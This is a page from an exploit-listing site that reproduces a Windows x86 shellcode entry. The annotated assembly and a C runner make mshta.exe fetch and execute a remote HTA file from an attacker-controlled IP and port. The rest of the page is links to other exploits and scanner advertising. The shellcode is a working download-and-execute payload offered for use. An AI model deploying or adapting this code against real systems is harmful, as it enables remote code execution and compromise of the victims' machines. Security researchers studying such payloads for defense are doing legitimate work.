windowsx86 download using mshta.exe shellcode (100 bytes)

▸▸▸ Exploit & Vulnerability >> shellcode exploit & windows_x86 vulnerability

Online Vulnerability Scanner Tools

Code...

				
# Shellcode Title: Windows/x86 Download using mshta.exe Shellcode (100 bytes)
# Shellcode Author: Siddharth Sharma
# Shellcode Length: ~100 bytes
# Tested on: WIN7x86
# Date: 2020-06-16

/*

#Description
# Simply, instead of using mshta.exe to download file as: 
mshta.exe http://<IP>:<port>/<file_name.hta> ,
# We could use below shellcode that does the same.



=============================
xor eax, eax              ;clear eax,get msvcrt.dll               
mov ax, 0x7472             ;"tr\0\0"               
push eax
push dword 0x6376736d 	   ;cvsm        
push esp


mov ebx,0x77e3395c         ;call LoadLibraryA
call ebx
mov ebp,eax		    ;msvcrt.dll is saved in ebp


;mshta.exe http://192.168.43.192:8080/9MKWaRO.hta
xor eax,eax
PUSH eax
PUSH 0x6174682e         ;".hta"
PUSH 0x4f526157		;"WaRO"
PUSH 0x4b4d392f		;"/9MK"
PUSH 0x38303830		;"8080"
PUSH 0x3a323931		;"192:"
PUSH 0x2e33342e		;".43."
PUSH 0x3836312e		;".168"
PUSH 0x3239312f		;"/192"
PUSH 0x2f3a7074		;"tp:/"
PUSH 0x74682065		;"e ht"
PUSH 0x78652e61		;"a.ex"
PUSH 0x7468736d		;"msht"



MOV EDI,ESP          ;adding a pointer to the stack                  
PUSH EDI


Mov eax,0x6ffab16f	    ;call System	
call eax

xor eax, eax
push eax
mov eax, 0x77e3214f         ;call ExitProcess
call eax
=====================================
*/


char code[] = "\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x5c\x39\xe3\x77\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x68\x74\x61\x68\x57\x61\x52\x4f\x68\x2f\x39\x4d\x4b\x68\x30\x38\x30\x38\x68\x31\x39\x32\x3a\x68\x2e\x34\x33\x2e\x68\x2e\x31\x36\x38\x68\x2f\x31\x39\x32\x68\x74\x70\x3a\x2f\x68\x65\x20\x68\x74\x68\x61\x2e\x65\x78\x68\x6d\x73\x68\x74\x89\xe7\x57\xb8\x6f\xb1\xfa\x6f\xff\xd0\x31\xc0\x50\xb8\x4f\x21\xe3\x77\xff\xd0";

int main(int argc, char **argv)
{
	int(*func)();
	func = (int(*)()) code;
	(int)(*func)();
}

Windowsx86 download using mshta.exe shellcode (100 bytes) Vulnerability / Exploit Source : Windowsx86 download using mshta.exe shellcode (100 bytes)

Last Vulnerability or Exploits

▸ gitlab 14.9 - stored cross-site scripting (xss) ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ gitlab 14.9 - authentication bypass ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ easeus data recovery - 'ensserver.exe' unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

▸ ptpublisher v2.3.4 - unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Discover posible vulnerabilities before GO LIVE with your project
Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Do an audit to find and close the high risk issues before having a real damage and increase the costs
Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Bypass your network restrictions and scan from our IP for relevant results
Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Scan your website from any device with internet connection

Tusted by

Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.